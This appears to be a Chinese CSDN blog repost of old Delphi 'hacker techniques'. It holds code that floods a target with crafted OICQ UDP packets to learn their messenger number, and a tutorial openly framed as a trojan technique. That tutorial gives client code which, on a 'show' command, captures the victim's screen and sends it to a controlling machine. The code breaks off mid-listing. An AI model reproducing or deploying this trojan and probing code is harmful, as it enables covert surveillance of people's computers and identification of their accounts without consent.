用DELPHI实现的一些国内黑客程序技巧

实际上目前所有的OICQ探测方法都一样,发送一个OICQ消息给对方,凭借OICQ 的返回信息来判断对方的OICQ号码,具体的DELPHI实现如下: NMUDP1是ICS控件包的UDP控件。 NMUDP1.ReportLevel := Status_Basic; NMUDP1.RemoteHost := edit1.Text; NMUDP1.RemotePort := 4000; UdpTmpStr
摘要由CSDN通过智能技术生成
实际上目前所有的OICQ探测方法都一样,发送一个OICQ消息给对方,凭借OICQ 的返回信息来判断对方的OICQ号码,具体的DELPHI实现如下: NMUDP1是ICS控件包的UDP控件。 

NMUDP1.ReportLevel := Status_Basic; 
NMUDP1.RemoteHost := edit1.Text; 
NMUDP1.RemotePort := 4000; 


UdpTmpStr :=#$02 +#$03 +#$0a +#$00 +#$78 +#13 +#$A 
+ '88888' +#$1f +#$30 +#$1f + #$33 + #$39 +#$1f 
+FormatDateTime('yyyy-mm-dd',now) 
+#$1f 
+FormatDateTime('hh:mm:ss',now) 
+#$1f 
+ '你正在被某位朋友查询。他使用了追捕这个工具软件(http://www.zhuibu.com/)进行探测,此OICQ号码已经被反馈给对方。' 

+ '信息所提示的OICQ号码为虚假号码,但可以即时回复。' + #$03; 

if OicqCheck.Checked then begin 
for SendUdpNum:=1 to 10 do begin 
MyStream := TMemoryStream.Create; 
try 
MyStream.Write(UdpTmpStr[1], Length(UdpTmpStr)); 
NMUDP1.SendStream(MyStream); 
finally 
MyStream.Free; 
end; 
end; 
end; 
待续.. 
感谢冯志宏先生





远程屏幕抓取,写一个木马程序必备的技巧 
Thursday,Oct-26 


檀革勤 [互联网]


木马的一个很重要的功能就是远程监视屏幕,下面的文章讲述了怎样利用UDP协议来实现,而不是我们通常用到的tcp/ip协议,很有特色,值得一学。 

一、软硬件要求。 

Windows95/98对等网,用来监视的计算机(以下简称主控机)和被监视的计算机(以下简称受控机)都必须装有TCP/IP 
协议,并正确配置。如没有网络,也可以在一台计算机上进行调试。 

二、实现方法。 

编制两个应用程序,一个为VClient.exe,装在受控机上,另一个为VServer.exe,装在主控机上。VServer.exe指定要监视的受控机的IP地址和将要在受控机屏幕上抓取区域的大小和位置,并发出屏幕抓取指令给VClient.exe,VClient.exe得到指令后,在受控机屏幕上选取指定区域,生成数据流,将其发回主控机,并在主控机上显示出抓取区域的BMP图象。由以上过程可以看出,该方法的关键有二:一是如何在受控机上进行屏幕抓取,二是如何通过TCP/IP协议在两台计算机中传输数据。 


UDP(User Datagram 
Protocol,意为用户报文协议)是Internet上广泛采用的通信协议之一。与TCP协议不同,它是一种非连接的传输协议,没有确认机制,可靠性不如TCP,但它的效率却比TCP高,用于远程屏幕监视还是比较适合的。同时,UDP控件不区分服务器端和客户端,只区分发送端和接收端,编程上较为简单,故选用UDP协议,使用Delphi 
4.0提供的TNMUDP控件。 

三、创建演示程序。 

第一步,编制VClient.exe文件。新建Delphi工程,将默认窗体的Name属性设为“Client”。加入TNMUDP控件,Name属性设为“CUDP”;LocalPort属性设为“1111”,让控件CUDP监视受控机的1111端口,当有数据发送到该口时,触发控件CUDP的OnDataReceived事件;RemotePort属性设为“2222”,当控件CUDP发送数据时,将数据发到主控机的2222口。 


在implementation后面加入变量定义 

const BufSize=2048;{ 发送每一笔数据的缓冲区大小 } 
var 
BmpStream:TMemoryStream; 
LeftSize:Longint;{ 发送每一笔数据后剩余的字节数 } 

为Client的OnCreate事件添加代码: 
procedure TClient.FormCreate(Sender: TObject); 
begin 
BmpStream:=TMemoryStream.Create; 
end; 

为Client的OnDestroy事件添加代码: 
procedure TClient.FormDestroy(Sender: TObject); 
begin 
BmpStream.Free; 
end; 

为控件CUDP的OnDataReceived事件添加代码: 
procedure TClient.CUDPDataReceived(Sender: TComponent; 
NumberBytes: Integer; FromIP: String); 
var 
CtrlCode:array[0..29] of char; 
Buf:array[0..BufSize-1] of char; 
TmpStr:string; 
SendSize,LeftPos,TopPos,RightPos,BottomPos:integer; 
begin 
CUDP.ReadBuffer(CtrlCode,NumberBytes);{ 读取控制码 } 
if CtrlCode[0]+CtrlCode[1]+CtrlCode[2]+CtrlCode[3]='show' then 
begin { 控制码前4位为“show”表示主控机发出了抓屏指令 } 
if BmpStream.Size=0 then { 没有数据可发,必须截屏生成数据 } 
begin 
TmpStr:=StrPas(CtrlCode); 
TmpStr:=Copy(TmpStr,5,Length(TmpStr)-4); 
LeftPos:=StrToInt(Copy(TmpStr,1,Pos(':',TmpStr)-1)); 
TmpStr:=Copy(TmpStr,Pos(':',TmpStr)+1,Length(TmpStr) 
-Pos(':',TmpStr)); 
TopPos:=StrToInt(Copy(TmpStr,1,Pos(&
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值